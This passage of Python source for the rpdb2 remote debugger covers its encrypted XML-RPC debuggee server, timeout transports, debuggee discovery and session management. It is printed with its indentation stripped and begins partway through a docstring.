Modification of Python 2.3 SimpleXMLRPCServer.SimpleXMLRPCDispatcher
that uses my_xmlrpclib_loads(). Needed to prevent deadlocks.
"""
def __marshaled_dispatch(self, data, dispatch_method = None):
params, method = my_xmlrpclib_loads(data)
# generate response
try:
if dispatch_method is not None:
response = dispatch_method(method, params)
else:
response = self._dispatch(method, params)
# wrap response in a singleton tuple
response = (response,)
response = xmlrpclib.dumps(response, methodresponse=1)
except xmlrpclib.Fault:
fault = sys.exc_info()[1]
response = xmlrpclib.dumps(fault)
except:
# report exception back to server
response = xmlrpclib.dumps(
xmlrpclib.Fault(1, "%s:%s" % (sys.exc_type, sys.exc_value))
)
print_debug_exception()
return response
if sys.version_info[:2] <= (2, 3):
_marshaled_dispatch = __marshaled_dispatch
#def server_activate(self):
# self.socket.listen(1)
def handle_error(self, request, client_address):
print_debug("handle_error() in pid %d" % _getpid())
if g_ignore_broken_pipe + 5 > time.time():
return
return SimpleXMLRPCServer.SimpleXMLRPCServer.handle_error(self, request, client_address)
class CPwdServerProxy:
"""
Encrypted proxy to the debuggee.
Works by wrapping a xmlrpclib.ServerProxy object.
"""
def __init__(self, crypto, uri, transport = None, target_rid = 0):
self.m_crypto = crypto
self.m_proxy = xmlrpclib.ServerProxy(uri, transport)
self.m_fEncryption = is_encryption_supported()
self.m_target_rid = target_rid
self.m_method = getattr(self.m_proxy, DISPACHER_METHOD)
def __set_encryption(self, fEncryption):
self.m_fEncryption = fEncryption
def get_encryption(self):
return self.m_fEncryption
def __request(self, name, params):
"""
Call debuggee method 'name' with parameters 'params'.
"""
while True:
try:
#
# Encrypt method and params.
#
fencrypt = self.get_encryption()
args = (as_unicode(name), params, self.m_target_rid)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
rpdb_version = as_unicode(get_interface_compatibility_version())
r = self.m_method(rpdb_version, fencrypt, fcompress, digest, msg)
(fencrypt, fcompress, digest, msg) = r
#
# Decrypt response.
#
((max_index, _r, _e), id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg, fVerifyIndex = False)
if _e is not None:
raise _e
except AuthenticationBadIndex:
e = sys.exc_info()[1]
self.m_crypto.set_index(e.m_max_index, e.m_anchor)
continue
except xmlrpclib.Fault:
fault = sys.exc_info()[1]
if class_name(BadVersion) in fault.faultString:
s = fault.faultString.split("'")
version = ['', s[1]][len(s) > 0]
raise BadVersion(version)
if class_name(EncryptionExpected) in fault.faultString:
raise EncryptionExpected
elif class_name(EncryptionNotSupported) in fault.faultString:
if self.m_crypto.m_fAllowUnencrypted:
self.__set_encryption(False)
continue
raise EncryptionNotSupported
elif class_name(DecryptionFailure) in fault.faultString:
raise DecryptionFailure
elif class_name(AuthenticationBadData) in fault.faultString:
raise AuthenticationBadData
elif class_name(AuthenticationFailure) in fault.faultString:
raise AuthenticationFailure
else:
print_debug_exception()
assert False
except xmlrpclib.ProtocolError:
print_debug("Caught ProtocolError for %s" % name)
#print_debug_exception()
raise CConnectionException
return _r
def __getattr__(self, name):
return xmlrpclib._Method(self.__request, name)
class CIOServer:
"""
Base class for debuggee server.
"""
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
self.m_thread = None
self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
self.m_fAllowRemote = fAllowRemote
self.m_rid = rid
self.m_port = None
self.m_stop = False
self.m_server = None
self.m_work_queue = None
def shutdown(self):
self.stop()
def start(self):
self.m_thread = CThread(name = 'ioserver', target = self.run, shutdown = self.shutdown)
thread_set_daemon(self.m_thread, True)
self.m_thread.start()
def jumpstart(self):
self.m_stop = False
self.start()
def stop(self):
if self.m_stop:
return
print_debug('Stopping IO server... (pid = %d)' % _getpid())
self.m_stop = True
while thread_is_alive(self.m_thread):
try:
proxy = CPwdServerProxy(self.m_crypto, calcURL(LOOPBACK, self.m_port), CLocalTimeoutTransport())
proxy.null()
except (socket.error, CException):
pass
self.m_thread.join(0.5)
self.m_thread = None
self.m_work_queue.shutdown()
#try:
# self.m_server.socket.close()
#except:
# pass
print_debug('Stopping IO server, done.')
def export_null(self):
return 0
def run(self):
if self.m_server == None:
(self.m_port, self.m_server) = self.__StartXMLRPCServer()
self.m_work_queue = CWorkQueue()
self.m_server.register_function(self.dispatcher_method)
while not self.m_stop:
self.m_server.handle_request()
def dispatcher_method(self, rpdb_version, fencrypt, fcompress, digest, msg):
"""
Process RPC call.
"""
#print_debug('dispatcher_method() called with: %s, %s, %s, %s' % (rpdb_version, fencrypt, digest, msg[:100]))
if rpdb_version != as_unicode(get_interface_compatibility_version()):
raise BadVersion(as_unicode(get_version()))
try:
try:
#
# Decrypt parameters.
#
((name, __params, target_rid), client_id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg)
except AuthenticationBadIndex:
e = sys.exc_info()[1]
#print_debug_exception()
#
# Notify the caller on the expected index.
#
max_index = self.m_crypto.get_max_index()
args = (max_index, None, e)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
return (fencrypt, fcompress, digest, msg)
r = None
e = None
try:
#
# We are forcing the 'export_' prefix on methods that are
# callable through XML-RPC to prevent potential security
# problems
#
func = getattr(self, 'export_' + name)
except AttributeError:
raise Exception('method "%s" is not supported' % ('export_' + name))
try:
if (target_rid != 0) and (target_rid != self.m_rid):
raise NotAttached
#
# Record that client id is still attached.
#
self.record_client_heartbeat(client_id, name, __params)
r = func(*__params)
except Exception:
_e = sys.exc_info()[1]
print_debug_exception()
e = _e
#
# Send the encrypted result.
#
max_index = self.m_crypto.get_max_index()
args = (max_index, r, e)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
return (fencrypt, fcompress, digest, msg)
except:
print_debug_exception()
raise
def __StartXMLRPCServer(self):
"""
As the name says, start the XML RPC server.
Looks for an available tcp port to listen on.
"""
host = [LOOPBACK, ""][self.m_fAllowRemote]
port = SERVER_PORT_RANGE_START
while True:
try:
server = CXMLRPCServer((host, port), logRequests = 0)
return (port, server)
except socket.error:
e = sys.exc_info()[1]
if GetSocketError(e) != errno.EADDRINUSE:
raise
if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
raise
port += 1
continue
def record_client_heartbeat(self, id, name, params):
pass
class CServerInfo(object):
def __init__(self, age, port, pid, filename, rid, state, fembedded):
assert(is_unicode(rid))
self.m_age = age
self.m_port = port
self.m_pid = pid
self.m_filename = as_unicode(filename, sys.getfilesystemencoding())
self.m_module_name = as_unicode(CalcModuleName(filename), sys.getfilesystemencoding())
self.m_rid = rid
self.m_state = as_unicode(state)
self.m_fembedded = fembedded
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def __str__(self):
return 'age: %d, port: %d, pid: %d, filename: %s, rid: %s' % (self.m_age, self.m_port, self.m_pid, self.m_filename, self.m_rid)
class CDebuggeeServer(CIOServer):
"""
The debuggee XML RPC server class.
"""
def __init__(self, filename, debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid = None):
if rid is None:
rid = generate_rid()
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
CIOServer.__init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
self.m_filename = filename
self.m_pid = _getpid()
self.m_time = time.time()
self.m_debugger = debugger
self.m_rid = rid
def shutdown(self):
CIOServer.shutdown(self)
def record_client_heartbeat(self, id, name, params):
finit = (name == 'request_break')
fdetach = (name == 'request_go' and True in params)
self.m_debugger.record_client_heartbeat(id, finit, fdetach)
def export_null(self):
return self.m_debugger.send_event_null()
def export_server_info(self):
age = time.time() - self.m_time
state = self.m_debugger.get_state()
fembedded = self.m_debugger.is_embedded()
si = CServerInfo(age, self.m_port, self.m_pid, self.m_filename, self.m_rid, state, fembedded)
return si
def export_sync_with_events(self, fException, fSendUnhandled):
ei = self.m_debugger.sync_with_events(fException, fSendUnhandled)
return ei
def export_wait_for_event(self, timeout, event_index):
(new_event_index, s) = self.m_debugger.wait_for_event(timeout, event_index)
return (new_event_index, s)
def export_set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
self.m_debugger.set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding)
return 0
def export_disable_breakpoint(self, id_list, fAll):
self.m_debugger.disable_breakpoint(id_list, fAll)
return 0
def export_enable_breakpoint(self, id_list, fAll):
self.m_debugger.enable_breakpoint(id_list, fAll)
return 0
def export_delete_breakpoint(self, id_list, fAll):
self.m_debugger.delete_breakpoint(id_list, fAll)
return 0
def export_get_breakpoints(self):
bpl = self.m_debugger.get_breakpoints()
return bpl
def export_request_break(self):
self.m_debugger.request_break()
return 0
def export_request_go(self, fdetach = False):
self.m_debugger.request_go()
return 0
def export_request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
self.m_debugger.request_go_breakpoint(filename, scope, lineno, frame_index, fException)
return 0
def export_request_step(self):
self.m_debugger.request_step()
return 0
def export_request_next(self):
self.m_debugger.request_next()
return 0
def export_request_return(self):
self.m_debugger.request_return()
return 0
def export_request_jump(self, lineno):
self.m_debugger.request_jump(lineno)
return 0
def export_get_stack(self, tid_list, fAll, fException):
r = self.m_debugger.get_stack(tid_list, fAll, fException)
return r
def export_get_source_file(self, filename, lineno, nlines, frame_index, fException):
r = self.m_debugger.get_source_file(filename, lineno, nlines, frame_index, fException)
return r
def export_get_source_lines(self, nlines, fAll, frame_index, fException):
r = self.m_debugger.get_source_lines(nlines, fAll, frame_index, fException)
return r
def export_get_thread_list(self):
r = self.m_debugger.get_thread_list()
return r
def export_set_thread(self, tid):
self.m_debugger.set_thread(tid)
return 0
def export_get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
r = self.m_debugger.get_namespace(nl, filter_level, frame_index, fException, repr_limit, encoding, fraw)
return r
def export_evaluate(self, expr, frame_index, fException, encoding, fraw):
(v, w, e) = self.m_debugger.evaluate(expr, frame_index, fException, encoding, fraw)
return (v, w, e)
def export_execute(self, suite, frame_index, fException, encoding):
(w, e) = self.m_debugger.execute(suite, frame_index, fException, encoding)
return (w, e)
def export_stop_debuggee(self):
self.m_debugger.stop_debuggee()
return 0
def export_set_synchronicity(self, fsynchronicity):
self.m_debugger.set_synchronicity(fsynchronicity)
return 0
def export_set_trap_unhandled_exceptions(self, ftrap):
self.m_debugger.set_trap_unhandled_exceptions(ftrap)
return 0
def export_is_unhandled_exception(self):
return self.m_debugger.is_unhandled_exception()
def export_set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_debugger.set_fork_mode(ffork_into_child, ffork_auto)
return 0
def export_set_environ(self, envmap):
self.m_debugger.set_environ(envmap)
return 0
def export_embedded_sync(self):
self.m_debugger.embedded_sync()
return 0
#
# ------------------------------------- RPC Client --------------------------------------------
#
#
# MOD
#
class CTimeoutHTTPConnection(httplib.HTTPConnection):
"""
Modification of httplib.HTTPConnection with timeout for sockets.
"""
_rpdb2_timeout = PING_TIMEOUT
def connect(self):
"""Connect to the host and port specified in __init__."""
# New Python version of connect().
if hasattr(self, 'timeout'):
self.timeout = self._rpdb2_timeout
return httplib.HTTPConnection.connect(self)
# Old Python version of connect().
msg = "getaddrinfo returns an empty list"
for res in socket.getaddrinfo(self.host, self.port, 0,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
self.sock = socket.socket(af, socktype, proto)
self.sock.settimeout(self._rpdb2_timeout)
if self.debuglevel > 0:
print_debug("connect: (%s, %s)" % (self.host, self.port))
self.sock.connect(sa)
except socket.error:
msg = sys.exc_info()[1]
if self.debuglevel > 0:
print_debug('connect fail: ' + repr((self.host, self.port)))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error(msg)
#
# MOD
#
class CLocalTimeoutHTTPConnection(CTimeoutHTTPConnection):
"""
Modification of httplib.HTTPConnection with timeout for sockets.
"""
_rpdb2_timeout = LOCAL_TIMEOUT
if is_py3k():
class httplib_HTTP(object):
pass
else:
httplib_HTTP = httplib.HTTP
#
# MOD
#
class CTimeoutHTTP(httplib_HTTP):
"""
Modification of httplib.HTTP with timeout for sockets.
"""
_connection_class = CTimeoutHTTPConnection
#
# MOD
#
class CLocalTimeoutHTTP(httplib_HTTP):
"""
Modification of httplib.HTTP with timeout for sockets.
"""
_connection_class = CLocalTimeoutHTTPConnection
#
# MOD
#
class CLocalTransport(xmlrpclib.Transport):
"""
Modification of xmlrpclib.Transport to work around Zonealarm sockets
bug.
"""
_connection_class = httplib.HTTPConnection
_connection_class_old = httplib_HTTP
def make_connection(self, host):
# New Python version of connect().
# However, make_connection is hacked to always create a new connection
# Otherwise all threads use single connection and crash.
if hasattr(self, '_connection'):
chost, self._extra_headers, x509 = self.get_host_info(host)
return self._connection_class(chost)
# Old Python version of connect().
# create a HTTP connection object from a host descriptor
host, extra_headers, x509 = self.get_host_info(host)
return self._connection_class_old(host)
def __parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
time.sleep(0.002)
response = file.read(1024)
if not response:
break
if self.verbose:
_print("body: " + repr(response))
p.feed(response)
file.close()
p.close()
return u.close()
if os.name == 'nt':
_parse_response = __parse_response
#
# MOD
#
class CTimeoutTransport(CLocalTransport):
"""
Modification of xmlrpclib.Transport with timeout for sockets.
"""
_connection_class = CTimeoutHTTPConnection
_connection_class_old = CTimeoutHTTP
#
# MOD
#
class CLocalTimeoutTransport(CLocalTransport):
"""
Modification of xmlrpclib.Transport with timeout for sockets.
"""
_connection_class = CLocalTimeoutHTTPConnection
_connection_class_old = CLocalTimeoutHTTP
class CSession:
"""
Basic class that communicates with the debuggee server.
"""
def __init__(self, host, port, _rpdb2_pwd, fAllowUnencrypted, rid):
self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
self.m_host = host
self.m_port = port
self.m_proxy = None
self.m_server_info = None
self.m_exc_info = None
self.m_fShutDown = False
self.m_fRestart = False
def get_encryption(self):
return self.m_proxy.get_encryption()
def getServerInfo(self):
return self.m_server_info
def pause(self):
self.m_fRestart = True
def restart(self, sleep = 0, timeout = 10):
self.m_fRestart = True
time.sleep(sleep)
t0 = time.time()
try:
try:
while time.time() < t0 + timeout:
try:
self.Connect()
return
except socket.error:
continue
raise CConnectionException
except:
self.m_fShutDown = True
raise
finally:
self.m_fRestart = False
def shut_down(self):
self.m_fShutDown = True
def getProxy(self):
"""
Return the proxy object.
With this object you can invoke methods on the server.
"""
while self.m_fRestart:
time.sleep(0.1)
if self.m_fShutDown:
raise NotAttached
return self.m_proxy
def ConnectAsync(self):
t = threading.Thread(target = self.ConnectNoThrow)
#thread_set_daemon(t, True)
t.start()
return t
def ConnectNoThrow(self):
try:
self.Connect()
except:
self.m_exc_info = sys.exc_info()
def Connect(self):
host = self.m_host
if host.lower() == LOCALHOST:
host = LOOPBACK
server = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CTimeoutTransport())
server_info = server.server_info()
self.m_proxy = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CLocalTransport(), target_rid = server_info.m_rid)
self.m_server_info = server_info
def isConnected(self):
return self.m_proxy is not None
class CServerList:
def __init__(self, host):
self.m_host = host
self.m_list = []
self.m_errors = {}
def calcList(self, _rpdb2_pwd, rid, key = None):
sil = []
sessions = []
self.m_errors = {}
port = SERVER_PORT_RANGE_START
while port < SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH:
s = CSession(self.m_host, port, _rpdb2_pwd, fAllowUnencrypted = True, rid = rid)
t = s.ConnectAsync()
sessions.append((s, t))
port += 1
for (s, t) in sessions:
t.join()
if (s.m_exc_info is not None):
if not issubclass(s.m_exc_info[0], socket.error):
self.m_errors.setdefault(s.m_exc_info[0], []).append(s.m_exc_info)
continue
si = s.getServerInfo()
if si is not None:
sil.append((-si.m_age, si))
sil.sort()
self.m_list = [s[1] for s in sil]
if key != None:
try:
return self.findServers(key)[0]
except:
pass
if key != None:
raise UnknownServer
sil.sort()
self.m_list = [s[1] for s in sil]
return self.m_list
def get_errors(self):
return self.m_errors
def findServers(self, key):
try:
n = int(key)
_s = [s for s in self.m_list if (s.m_pid == n) or (s.m_rid == key)]
except ValueError:
key = as_string(key, sys.getfilesystemencoding())
_s = [s for s in self.m_list if key in s.m_filename]
if _s == []:
raise UnknownServer
return _s
class CSessionManagerInternal:
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
self.m_rpdb2_pwd = [_rpdb2_pwd, None][_rpdb2_pwd in [None, '']]
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_fAllowRemote = fAllowRemote
self.m_rid = generate_rid()
self.m_host = host
self.m_server_list_object = CServerList(host)
self.m_session = None
self.m_server_info = None
self.m_worker_thread = None
self.m_worker_thread_ident = None
self.m_fStop = False
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions = {}
self.m_remote_event_index = 0
self.m_event_dispatcher_proxy = CEventDispatcher()
self.m_event_dispatcher = CEventDispatcher(self.m_event_dispatcher_proxy)
self.m_state_manager = CStateManager(STATE_DETACHED, self.m_event_dispatcher, self.m_event_dispatcher_proxy)
self.m_breakpoints_proxy = CBreakPointsManagerProxy(self)
event_type_dict = {CEventState: {EVENT_EXCLUDE: [STATE_BROKEN, STATE_ANALYZE]}}
self.register_callback(self.reset_frame_indexes, event_type_dict, fSingleUse = False)
event_type_dict = {CEventStackDepth: {}}
self.register_callback(self.set_stack_depth, event_type_dict, fSingleUse = False)
event_type_dict = {CEventNoThreads: {}}
self.register_callback(self._reset_frame_indexes, event_type_dict, fSingleUse = False)
event_type_dict = {CEventExit: {}}
self.register_callback(self.on_event_exit, event_type_dict, fSingleUse = False)
event_type_dict = {CEventConflictingModules: {}}
self.register_callback(self.on_event_conflicting_modules, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSignalIntercepted: {}}
self.register_callback(self.on_event_signal_intercept, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSignalException: {}}
self.register_callback(self.on_event_signal_exception, event_type_dict, fSingleUse = False)
event_type_dict = {CEventEmbeddedSync: {}}
self.register_callback(self.on_event_embedded_sync, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSynchronicity: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_synchronicity, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
event_type_dict = {CEventTrap: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_trap, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
event_type_dict = {CEventForkMode: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_fork_mode, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
self.m_printer = self.__nul_printer
self.m_last_command_line = None
self.m_last_fchdir = None
self.m_fsynchronicity = True
self.m_ftrap = True
self.m_ffork_into_child = False
self.m_ffork_auto = False
self.m_environment = []
self.m_encoding = ENCODING_AUTO
self.m_fraw = False
def shutdown(self):
self.m_event_dispatcher_proxy.shutdown()
self.m_event_dispatcher.shutdown()
self.m_state_manager.shutdown()
def __nul_printer(self, _str):
pass
def set_printer(self, printer):
self.m_printer = printer
def register_callback(self, callback, event_type_dict, fSingleUse):
return self.m_event_dispatcher.register_callback(callback, event_type_dict, fSingleUse)
def remove_callback(self, callback):
return self.m_event_dispatcher.remove_callback(callback)
def __wait_for_debuggee(self, rid):
try:
time.sleep(STARTUP_TIMEOUT / 2)
for i in range(STARTUP_RETRIES):
try:
print_debug('Scanning for debuggee...')
t0 = time.time()
return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
except UnknownServer:
dt = time.time() - t0
if dt < STARTUP_TIMEOUT:
time.sleep(STARTUP_TIMEOUT - dt)
continue
return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
finally:
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors, fsupress_pwd_warning = True)
def get_encryption(self):
return self.getSession().get_encryption()
def launch(self, fchdir, command_line, fload_breakpoints = True):
assert(is_unicode(command_line))
self.__verify_unattached()
if not os.name in [POSIX, 'nt']:
self.m_printer(STR_SPAWN_UNSUPPORTED)
raise SpawnUnsupported
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
if self.m_rpdb2_pwd is None:
self.set_random_password()
if command_line == '':
raise BadArgument
(path, filename, args) = split_command_line_path_filename_args(command_line)
#if not IsPythonSourceFile(filename):
# raise NotPythonSource
_filename = my_os_path_join(path, filename)
ExpandedFilename = FindFile(_filename)
self.set_host(LOCALHOST)
self.m_printer(STR_STARTUP_SPAWN_NOTICE)
rid = generate_rid()
create_pwd_file(rid, self.m_rpdb2_pwd)
self.m_state_manager.set_state(STATE_SPAWNING)
try:
try:
self._spawn_server(fchdir, ExpandedFilename, args, rid)
server = self.__wait_for_debuggee(rid)
self.attach(server.m_rid, server.m_filename, fsupress_pwd_warning = True, fsetenv = True, ffirewall_test = False, server = server, fload_breakpoints = fload_breakpoints)
self.m_last_command_line = command_line
self.m_last_fchdir = fchdir
except:
if self.m_state_manager.get_state() != STATE_DETACHED:
self.m_state_manager.set_state(STATE_DETACHED)
raise
finally:
delete_pwd_file(rid)
def restart(self):
"""
Restart debug session with same command_line and fchdir arguments
which were used in last launch.
"""
if None in (self.m_last_fchdir, self.m_last_command_line):
return
if self.m_state_manager.get_state() != STATE_DETACHED:
self.stop_debuggee()
self.launch(self.m_last_fchdir, self.m_last_command_line)
def get_launch_args(self):
"""
Return command_line and fchdir arguments which were used in last
launch as (last_fchdir, last_command_line).
Returns None if there is no info.
"""
if None in (self.m_last_fchdir, self.m_last_command_line):
return (None, None)
return (self.m_last_fchdir, self.m_last_command_line)
def _spawn_server(self, fchdir, ExpandedFilename, args, rid):
"""
Start an OS console to act as server.
What it does is to start rpdb again in a new console in server only mode.
"""
if g_fScreen:
name = SCREEN
elif sys.platform == DARWIN:
name = DARWIN
else:
try:
import terminalcommand
name = MAC
except:
name = os.name
if name == 'nt' and g_fDebug:
name = NT_DEBUG
e = ['', ' --encrypt'][not self.m_fAllowUnencrypted]
r = ['', ' --remote'][self.m_fAllowRemote]
c = ['', ' --chdir'][fchdir]
p = ['', ' --pwd="%s"' % self.m_rpdb2_pwd][os.name == 'nt']
b = ''
encoding = detect_locale()
fse = sys.getfilesystemencoding()
ExpandedFilename = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
ExpandedFilename = as_unicode(ExpandedFilename, fse)
if as_bytes('?') in as_bytes(ExpandedFilename, encoding, fstrict = False):
_u = as_bytes(ExpandedFilename)
_b = base64.encodestring(_u)
_b = _b.strip(as_bytes('\n')).translate(g_safe_base64_to)
_b = as_string(_b, fstrict = True)
b = ' --base64=%s' % _b
debugger = os.path.abspath(__file__)
if debugger[-1:] == 'c':
debugger = debugger[:-1]
debugger = as_unicode(debugger, fse)
debug_prints = ['', ' --debug'][g_fDebug]
options = '"%s"%s --debugee%s%s%s%s%s --rid=%s "%s" %s' % (debugger, debug_prints, p, e, r, c, b, rid, ExpandedFilename, args)
python_exec = sys.executable
if python_exec.endswith('w.exe'):
python_exec = python_exec[:-5] + '.exe'
python_exec = as_unicode(python_exec, fse)
if as_bytes('?') in as_bytes(python_exec + debugger, encoding, fstrict = False):
raise BadMBCSPath
if name == POSIX:
shell = CalcUserShell()
terminal_command = CalcTerminalCommand()
if terminal_command in osSpawn:
command = osSpawn[terminal_command] % {'shell': shell, 'exec': python_exec, 'options': options}
else:
command = osSpawn[name] % {'term': terminal_command, 'shell': shell, 'exec': python_exec, 'options': options}
else:
command = osSpawn[name] % {'exec': python_exec, 'options': options}
if name == DARWIN:
s = 'cd "%s" ; %s' % (getcwdu(), command)
command = CalcMacTerminalCommand(s)
print_debug('Terminal open string: %s' % repr(command))
command = as_string(command, encoding)
if name == MAC:
terminalcommand.run(command)
else:
subprocess.Popen(command, shell=True)
def attach(self, key, name = None, fsupress_pwd_warning = False, fsetenv = False, ffirewall_test = True, server = None, fload_breakpoints = True):
assert(is_unicode(key))
self.__verify_unattached()
if key == '':
raise BadArgument
if self.m_rpdb2_pwd is None:
#self.m_printer(STR_PASSWORD_MUST_BE_SET)
raise UnsetPassword
if g_fFirewallTest and ffirewall_test:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
elif not g_fFirewallTest and ffirewall_test:
print_debug('Skipping firewall test.')
if name is None:
name = key
_name = name
self.m_printer(STR_STARTUP_NOTICE)
self.m_state_manager.set_state(STATE_ATTACHING)
try:
servers = [server]
if server == None:
self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
servers = self.m_server_list_object.findServers(key)
server = servers[0]
_name = server.m_filename
errors = self.m_server_list_object.get_errors()
if not key in [server.m_rid, str(server.m_pid)]:
self.__report_server_errors(errors, fsupress_pwd_warning)
self.__attach(server, fsetenv)
if len(servers) > 1:
self.m_printer(STR_MULTIPLE_DEBUGGEES % key)
self.m_printer(STR_ATTACH_CRYPTO_MODE % ([' ' + STR_ATTACH_CRYPTO_MODE_NOT, ''][self.get_encryption()]))
self.m_printer(STR_ATTACH_SUCCEEDED % server.m_filename)
try:
if fload_breakpoints:
self.load_breakpoints()
except:
pass
except (socket.error, CConnectionException):
self.m_printer(STR_ATTACH_FAILED_NAME % _name)
self.m_state_manager.set_state(STATE_DETACHED)
raise
except:
print_debug_exception()
assert False
def report_exception(self, _type, value, tb):
msg = g_error_mapping.get(_type, STR_ERROR_OTHER)
if _type == SpawnUnsupported and os.name == POSIX and not g_fScreen and g_fDefaultStd:
msg += ' ' + STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX
if _type == UnknownServer and os.name == POSIX and not g_fScreen and g_fDefaultStd:
msg += ' ' + STR_DISPLAY_ERROR
_str = msg % {'type': _type, 'value': value, 'traceback': tb}
self.m_printer(_str)
if not _type in g_error_mapping:
print_exception(_type, value, tb, True)
def __report_server_errors(self, errors, fsupress_pwd_warning = False):
for k, el in errors.items():
if fsupress_pwd_warning and k in [BadVersion, AuthenticationBadData, AuthenticationFailure]:
continue
if k in [BadVersion]:
for (t, v, tb) in el:
self.report_exception(t, v, None)
continue
(t, v, tb) = el[0]
self.report_exception(t, v, tb)
def __attach(self, server, fsetenv):
self.__verify_unattached()
session = CSession(self.m_host, server.m_port, self.m_rpdb2_pwd, self.m_fAllowUnencrypted, self.m_rid)
session.Connect()
if (session.getServerInfo().m_pid != server.m_pid) or (session.getServerInfo().m_filename != server.m_filename):
raise UnexpectedData
self.m_session = session
self.m_server_info = self.get_server_info()
self.getSession().getProxy().set_synchronicity(self.m_fsynchronicity)
self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
self.getSession().getProxy().set_fork_mode(self.m_ffork_into_child, self.m_ffork_auto)
if fsetenv and len(self.m_environment) != 0:
self.getSession().getProxy().set_environ(self.m_environment)
self.request_break()
self.refresh(True)
self.__start_event_monitor()
print_debug('Attached to debuggee on port %d.' % session.m_port)
#self.enable_breakpoint([], fAll = True)
def __verify_unattached(self):
if self.__is_attached():
raise AlreadyAttached
def __verify_attached(self):
if not self.__is_attached():
raise NotAttached
def __is_attached(self):
return (self.m_state_manager.get_state() != STATE_DETACHED) and (self.m_session is not None)
def __verify_broken(self):
if self.m_state_manager.get_state() not in [STATE_BROKEN, STATE_ANALYZE]:
raise DebuggerNotBroken
def refresh(self, fSendUnhandled = False):
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
self.m_remote_event_index = self.getSession().getProxy().sync_with_events(fAnalyzeMode, fSendUnhandled)
self.m_breakpoints_proxy.sync()
def __start_event_monitor(self):
self.m_fStop = False
self.m_worker_thread = threading.Thread(target = self.__event_monitor_proc)
#thread_set_daemon(self.m_worker_thread, True)
self.m_worker_thread.start()
def __event_monitor_proc(self):
self.m_worker_thread_ident = thread.get_ident()
t = 0
nfailures = 0
while not self.m_fStop:
try:
t = ControlRate(t, IDLE_MAX_RATE)
if self.m_fStop:
return
(n, sel) = self.getSession().getProxy().wait_for_event(PING_TIMEOUT, self.m_remote_event_index)
if True in [isinstance(e, CEventForkSwitch) for e in sel]:
print_debug('Received fork switch event.')
self.getSession().pause()
threading.Thread(target = self.restart_session_job).start()
if True in [isinstance(e, CEventExecSwitch) for e in sel]:
print_debug('Received exec switch event.')
self.getSession().pause()
threading.Thread(target = self.restart_session_job, args = (True, )).start()
if True in [isinstance(e, CEventExit) for e in sel]:
self.getSession().shut_down()
self.m_fStop = True
if n > self.m_remote_event_index:
#print >> sys.__stderr__, (n, sel)
self.m_remote_event_index = n
self.m_event_dispatcher_proxy.fire_events(sel)
nfailures = 0
except CConnectionException:
if not self.m_fStop:
self.report_exception(*sys.exc_info())
threading.Thread(target = self.detach_job).start()
return
except socket.error:
if nfailures < COMMUNICATION_RETRIES:
nfailures += 1
continue
if not self.m_fStop:
self.report_exception(*sys.exc_info())
threading.Thread(target = self.detach_job).start()
return
def on_event_conflicting_modules(self, event):
s = ', '.join(event.m_modules_list)
self.m_printer(STR_CONFLICTING_MODULES % s)
def on_event_signal_intercept(self, event):
if self.m_state_manager.get_state() in [STATE_ANALYZE, STATE_BROKEN]:
self.m_printer(STR_SIGNAL_INTERCEPT % (event.m_signame, event.m_signum))
def on_event_signal_exception(self, event):
self.m_printer(STR_SIGNAL_EXCEPTION % (event.m_description, event.m_signame, event.m_signum))
def on_event_embedded_sync(self, event):
#
